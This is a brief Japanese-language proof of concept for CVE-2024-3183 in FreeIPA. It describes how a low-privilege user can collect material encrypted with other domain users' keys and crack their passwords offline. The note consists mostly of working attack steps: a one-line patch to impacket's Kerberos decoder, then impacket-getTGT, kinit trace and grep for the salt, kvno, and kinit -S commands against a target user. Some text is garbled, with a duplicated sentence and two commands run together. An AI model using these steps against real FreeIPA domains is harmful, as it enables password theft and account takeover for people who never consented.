
CVE-2024-3183 (FreeIPA Rosting) の PoC
影響: 低権限ユーザーがすべてのドメインユーザーのパスワードのハッシュを取得し、オフラインでブルートフォース攻撃(kerberoasting)を実行できます。
impacket-getTGT へのパッチ:
impacket/krb5/kerberosv5.py に decoder.decode.defaultErrorState = stGetValueDecoderByTag を追加します。impacket/krb5/kerberosv5.py に decoder.decode.defaultErrorState = stGetValueDecoderByTag を追加します。impacket-getTGT を -service オプションと -debug オプションと共に使用することで、1つのコマンドで salt を取得できます。
impacket-getTGT test.local/user -debug -service adminkinit user

printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt

kvno admin


1 - TGS, 2 - SALT, 3 - パスワード.
kinit -S target user
これにより、対象ユーザーのキーで暗号化された TGT を取得できます。